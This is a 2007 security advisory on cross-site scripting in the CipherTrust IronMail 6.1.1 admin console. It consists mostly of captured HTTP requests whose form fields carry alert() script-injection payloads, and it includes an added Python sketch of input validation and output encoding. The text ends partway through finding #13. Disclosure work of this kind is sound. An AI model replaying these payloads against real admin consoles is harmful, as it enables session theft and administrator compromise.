Multiple XSS in IronMail




Found multiple XSS in IronMail.

See attached advisory. Spanish version at http://www.514.es.

Regards,

- J

Attachment: SIAADV-07-004-EN.txt

          ==============================
                   - Advisory -
          ==============================
   Title:   Multiple XSS in CipherTrust IronMail 6.1.1
    Risk:   Medium
    Date:   20.Feb.2007
  Author:   Javier Olascoaga
     Web:   http://www.514.es/


.: [ INTRO ] :.

IronMail protects enterprise email systems from inbound threats: spam, viruses,
or hackers trying to take down or take over the e-mail system. IronMail protects
enterprise email systems from outbound threats: regulatory compliance violations,
corporate policy violations, or theft ("leakage") of confidential information
or intellectual property. IronMail protects enterprise email systems from
threats that haven't even been identified yet.

.: [ TECHNICAL DESCRIPTION ] :.

During technical testing of the IronMail mail system, several Cross Site
Scripting vulnerabilities were detected in the administration console of the
product.


The XSS issues found are listed below:

.: [ XSS #1 ] :.

POST https://172.0.0.2:10443/admin/systemRouting.do?method=submit HTTP/1.1
Referer:
https://172.0.0.2:10443/admin/systemRouting.do?method=init&isMenuToggled=1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 295
Cache-Control: no-cache
Cookie: CTSecureToken=53DFBE4753D221B2707050E96902E98D_admin;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemRouting.do%3Fmethod%3Dinit%26isMenuToggled%3D1;
menusToExpand=%2CConfigurationMenu%2C; tabbedMenuSelected=11;
/admin/queueManager.dofirsttimeload=1; /admin/queueManager.do=;
JSESSIONID=B227892A258E91419C09469E49AED4D4
rows%5B0%5D.networkId=172.16.0.0&rows%5B0%5D.netmaskId=255.255.0.0&rows%5B1%5D.networkId=192.168.0.0&rows%5B1%5D.netmaskId=255.255.0.0&network=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&netmask=128.0.0.0&defRouterIp=%27%3E%3Cscript%3Ealert%28%27SIA2%27%29%3C%2Fscript%3E&submit=Submit


.: [ XSS #2 ] :.

POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/system_IronMail.do?method=getDetail&isMenuToggled=1
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 343
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=17;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fmethod%3DgetDetail%26isMenuToggled%3D1;
menusToExpand=%2CConfigurationMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
mtu=1500&hostName=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&domainName=sytes.net&ipAddress=10.1.1.1&ipNetMask=255.255.255.224&defaultRouter=10.1.1.2&dns1=10.1.1.3&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.nist.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadrid&ethernetSetting=autoselect&submit=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:11:46 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #3 ] :.

POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 341
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=17;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fmethod%3DsaveNew;
menusToExpand=%2CConfigurationMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
mtu=1500&hostName=mmail11&domainName=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&ipAddress=10.1.1.1&ipNetMask=255.255.255.224&defaultRouter=10.1.1.2&dns1=10.1.1.3&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.nist.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadrid&ethernetSetting=autoselect&submit=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:12:26 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #4 ] :.

POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 337
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=17;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fmethod%3DsaveNew;
menusToExpand=%2CConfigurationMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
mtu=1500&hostName=mmail11&domainName=sytes.net&ipAddress=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&ipNetMask=255.255.255.224&defaultRouter=10.1.1.2&dns1=10.1.1.3&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.nist.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadrid&ethernetSetting=autoselect&submit=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:12:31 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #5 ] :.

POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 337
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=17;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fmethod%3DsaveNew;
menusToExpand=%2CConfigurationMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
mtu=1500&hostName=mmail11&domainName=sytes.net&ipAddress=10.1.1.1&ipNetMask=255.255.255.224&defaultRouter=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&dns1=10.1.1.3&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.nist.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadrid&ethernetSetting=autoselect&submit=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:12:36 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #6 ] :.

POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 338
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=17;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fmethod%3DsaveNew;
menusToExpand=%2CConfigurationMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
mtu=1500&hostName=mmail11&domainName=sytes.net&ipAddress=10.1.1.1&ipNetMask=255.255.255.224&defaultRouter=10.1.1.2&dns1=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.nist.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadrid&ethernetSetting=autoselect&submit=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:12:41 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #7 ] :.

POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 340
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=17;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fmethod%3DsaveNew;
menusToExpand=%2CConfigurationMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
mtu=1500&hostName=mmail11&domainName=sytes.net&ipAddress=10.1.1.1&ipNetMask=255.255.255.224&defaultRouter=10.1.1.2&dns1=10.1.1.3&dns2=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&dns3=10.1.1.5&ntp1=time.nist.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadrid&ethernetSetting=autoselect&submit=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:12:48 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8
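
Added example, not part of the advisory and not the vendor's code: a server-side sketch of the two controls that stop the system_IronMail.do requests above, namely allow-list validation of each network field and HTML-attribute encoding when a value is written back into the form. The function names, the rule set, the MTU range and the single-quoted attribute context (suggested by the leading '> of the test string) are assumptions.

```python
import html
import ipaddress
import re
from urllib.parse import parse_qs

# Form body of the advisory's XSS #2 request (hostName carries the test string).
SAMPLE_BODY = (
    "mtu=1500&hostName=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E"
    "&domainName=sytes.net&ipAddress=10.1.1.1&ipNetMask=255.255.255.224"
    "&defaultRouter=10.1.1.2&dns1=10.1.1.3&dns2=10.1.1.4&dns3=10.1.1.5"
    "&ntp1=time.nist.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org"
    "&timeZone=Europe%2FMadrid&ethernetSetting=autoselect&submit=Submit"
)

_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME = re.compile(rf"{_LABEL}(?:\.{_LABEL})*")
_TOKEN = re.compile(r"[A-Za-z0-9_+/-]{1,64}")


def is_hostname(value):
    """DNS name: dot-separated labels of letters, digits and inner hyphens."""
    return len(value) <= 253 and _HOSTNAME.fullmatch(value) is not None


def is_ipv4(value):
    try:
        ipaddress.IPv4Address(value)
        return True
    except ValueError:
        return False


def is_netmask(value):
    """Dotted-quad mask whose one-bits are contiguous from the left."""
    if not is_ipv4(value):
        return False
    inverted = ~int(ipaddress.IPv4Address(value)) & 0xFFFFFFFF
    return (inverted & (inverted + 1)) == 0


def is_mtu(value):
    # Assumed range; the advisory only shows the value 1500.
    return re.fullmatch(r"[0-9]{2,4}", value) is not None and 68 <= int(value) <= 9000


def is_token(value):
    """Conservative pattern for timeZone / ethernetSetting (assumed format)."""
    return _TOKEN.fullmatch(value) is not None


# One rule per field seen in the request; a missing field fails its rule.
RULES = {
    "mtu": is_mtu,
    "hostName": is_hostname, "domainName": is_hostname,
    "ipAddress": is_ipv4, "ipNetMask": is_netmask, "defaultRouter": is_ipv4,
    "dns1": is_ipv4, "dns2": is_ipv4, "dns3": is_ipv4,
    "ntp1": is_hostname, "ntp2": is_hostname, "ntp3": is_hostname,
    "timeZone": is_token, "ethernetSetting": is_token,
}


def rejected_fields(body):
    """Return {field: offending value} for every field that fails its rule."""
    form = parse_qs(body, keep_blank_values=True)
    bad = {}
    for name, check in RULES.items():
        for value in form.get(name, [""]):
            if not check(value):
                bad[name] = value
    return bad


def render_input_unsafe(name, value):
    """Reflection without encoding: the value can close the attribute and tag."""
    return f"<input type='text' name='{name}' value='{value}'>"


def render_input(name, value):
    """Same field with both name and value encoded for an attribute context."""
    return "<input type='text' name='{}' value='{}'>".format(
        html.escape(name, quote=True), html.escape(value, quote=True)
    )


if __name__ == "__main__":
    for field, value in rejected_fields(SAMPLE_BODY).items():
        print("rejected:", field)
        print("  unsafe :", render_input_unsafe(field, value))
        print("  encoded:", render_input(field, value))
```

Validation rejects the request before it is stored; encoding is still applied on output so that a value that slips past a rule, or a rejected value echoed back in an error page, renders as text.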


.: [ XSS #8 ] :.

POST https://172.0.0.2:10443/admin/systemOutOfBand.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/systemOutOfBand.do?method=getDetail&isMenuToggled=1
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 154
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=17;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemOutOfBand.do%3Fmethod%3DgetDetail%26isMenuToggled%3D1;
menusToExpand=%2CConfigurationMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
outOfBand=true&mtu=1500&ipAddress=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&ethernetSetting=autoselect&ipNetMask=255.255.255.224&submit=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:13:16 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #9 ] :.

POST https://172.0.0.2:10443/admin/systemBackup.do?method=submit HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/systemBackup.do?method=init&isMenuToggled=1
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 146
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=17;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemBackup.do%3Fmethod%3Dinit%26isMenuToggled%3D1;
menusToExpand=%2CConfigurationMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
password=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&confirmPassword=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&submit=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:13:41 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #10 ] :.

POST https://172.0.0.2:10443/admin/systemLicenseManager.do?method=submit
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/systemLicenseManager.do?method=init&isMenuToggled=1
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 75
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=17;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemLicenseManager.do%3Fmethod%3Dinit%26isMenuToggled%3D1;
menusToExpand=%2CConfigurationMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
license=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&submit=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:20:28 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #11 ] :.

POST https://172.0.0.2:10443/admin/systemWebAdminConfig.do?method=save
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/systemWebAdminConfig.do?method=init&isMenuToggled=1&procId=90
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 1225
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=15;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemWebAdminConfig.do%3Fmethod%3Dinit%26isMenuToggled%3D1%26procId%3D90;
menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAccountMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
procId=90&rows%5B0%5D.attrName=gui_log_level&rows%5B0%5D.attrType=12&rows%5B0%5D.attrValidate=%5BLabelValueBean%5BCRITICAL%2C+1%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelValueBean%5BINFORMATION%2C+5%5D%2C+LabelValueBean%5BDETAILED%2C+6%5D%5D&rows%5B0%5D.attrValidateStr=30060003%3A1%2C30060004%3A4%2C30060005%3A5%2C30060006%3A6&rows%5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=true&rows%5B0%5D.attrValueStrClone=4&rows%5B0%5D.langTagId=2000003&rows%5B0%5D.attrValue=4&rows%5B1%5D.attrName=gui_timeout&rows%5B1%5D.attrType=2&rows%5B1%5D.attrValidate=%5B1-30%5D&rows%5B1%5D.attrValidateStr=%5B1-30%5D&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0&rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=30&rows%5B1%5D.langTagId=2001014&rows%5B1%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B2%5D.attrName=auto_refresh&rows%5B2%5D.attrType=2&rows%5B2%5D.attrValidate=%5B1-30%5D&rows%5B2%5D.attrValidateStr=%5B1-30%5D&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=0&rows%5B2%5D.modifyable=true&rows%5B2%5D.attrValueStrClone=4&rows%5B2%5D.langTagId=2001017&rows%5B2%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA2%27%29%3C%2Fscript%3E&submitValue=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:21:27 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #12 ] :.

POST
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=save
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=init&procId=164
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 2840
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=11;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/ldap_ConfigureServiceProperties.do%3Fmethod%3Dinit%26procId%3D164;
menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAccountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLDAPConfigurationMenu%2C;
/admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
procId=164&rows%5B0%5D.attrName=sync_time&rows%5B0%5D.attrType=2&rows%5B0%5D.attrValidate=%5B1-24%5D&rows%5B0%5D.attrValidateStr=%5B1-24%5D&rows%5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=true&rows%5B0%5D.attrValueStrClone=24&rows%5B0%5D.langTagId=2016401&rows%5B0%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B1%5D.attrName=sync_results_count&rows%5B1%5D.attrType=2&rows%5B1%5D.attrValidate=%5B1-500%5D&rows%5B1%5D.attrValidateStr=%5B1-500%5D&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0&rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=50&rows%5B1%5D.langTagId=2016402&rows%5B1%5D.attrValueStr=50&rows%5B2%5D.attrName=sync_rules_order&rows%5B2%5D.attrType=1&rows%5B2%5D.attrValidate=&rows%5B2%5D.attrValidateStr=&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=1&rows%5B2%5D.modifyable=true&rows%5B2%5D.attrValueStrClone=&rows%5B2%5D.langTagId=2016403&rows%5B2%5D.attrValue=&rows%5B3%5D.attrName=ldap_fail_open&rows%5B3%5D.attrType=5&rows%5B3%5D.attrValidate=&rows%5B3%5D.attrValidateStr=&rows%5B3%5D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3%5D.modifyable=true&rows%5B3%5D.attrValueStrClone=1&rows%5B3%5D.langTagId=2016404&rows%5B3%5D.attrValue=true&rows%5B4%5D.attrName=ldap_failure_count&rows%5B4%5D.attrType=2&rows%5B4%5D.attrValidate=%5B1-50%5D&rows%5B4%5D.attrValidateStr=%5B1-50%5D&rows%5B4%5D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B4%5D.modifyable=true&rows%5B4%5D.attrValueStrClone=3&rows%5B4%5D.langTagId=2016405&rows%5B4%5D.attrValueStr=3&rows%5B5%5D.attrName=ldap_monitor_intvl&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate=%5B1-1440%5D&rows%5B5%5D.attrValidateStr=%5B1-1440%5D&rows%5B5%5D.attrDepends=&rows%5B5%5D.multipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5D.attrValueStrClone=5&rows%5B5%5D.langTagId=2016406&rows%5B5%5D.attrValueStr=5&rows%5B6%5D.attrName=ldap_alert_type&rows%5B6%5D.attrType=12&rows%5B6%5D.attrValidate=%5BLabelValueBean%5BNo+Alert%2C+0%5D%2C+LabelValue
Bean%5BRESTART%2C+1%5D%2C+LabelValueBean%5BSHUTDOWN%2C+2%5D%2C+LabelValueBean%5BCRITICAL%2C+3%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelValueBean%5BWARNING%2C+5%5D%2C+LabelValueBean%5BNOTIFICATION%2C+6%5D%2C+LabelValueBean%5BINFORMATION%2C+7%5D%5D&rows%5B6%5D.attrValidateStr=30060019%3A0%2C30060007%3A1%2C30060008%3A2%2C30060003%3A3%2C30060004%3A4%2C30060009%3A5%2C30060010%3A6%2C30060005%3A7&rows%5B6%5D.attrDepends=&rows%5B6%5D.multipleValue=0&rows%5B6%5D.modifyable=true&rows%5B6%5D.attrValueStrClone=3&rows%5B6%5D.langTagId=2016407&rows%5B6%5D.attrValue=3&rows%5B7%5D.attrName=ldap_route_aft_masq&rows%5B7%5D.attrType=5&rows%5B7%5D.attrValidate=&rows%5B7%5D.attrValidateStr=&rows%5B7%5D.attrDepends=&rows%5B7%5D.multipleValue=0&rows%5B7%5D.modifyable=true&rows%5B7%5D.attrValueStrClone=0&rows%5B7%5D.langTagId=2016408&submitValue=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:22:51 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #13 ] :.

POST
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=save
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=save
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 2840
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=11;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/ldap_ConfigureServiceProperties.do%3Fmethod%3Dinit%26procId%3D164;
menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAccountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLDAPConfigurationMenu%2C;
/admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
